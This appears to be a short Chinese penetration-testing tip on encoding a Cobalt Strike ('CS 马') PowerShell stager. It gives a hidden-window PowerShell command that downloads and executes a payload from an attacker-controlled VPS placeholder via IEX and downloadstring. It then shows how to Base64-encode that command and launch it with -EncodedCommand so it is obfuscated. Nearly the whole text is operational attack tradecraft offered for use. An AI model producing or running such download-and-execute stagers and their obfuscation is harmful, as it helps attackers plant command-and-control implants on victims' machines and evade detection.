CS 马编码

2022-11-08

渗透测试技巧

Powershell CS 马编码

处理前

没有经过任何处理的 PowerShell CS 马

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://VPS的IP:端口/ps'))"

处理后

在 PowerShell 命令行中输入以下命令

$command= "IEX ((new-object net.webclient).downloadstring('http://VPS的IP:端口/ps'))"
$bytes = [Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
echo $encodedCommand

最后组装编码后的 Payload

powershell.exe -EncodedCommand 经过编码后的内容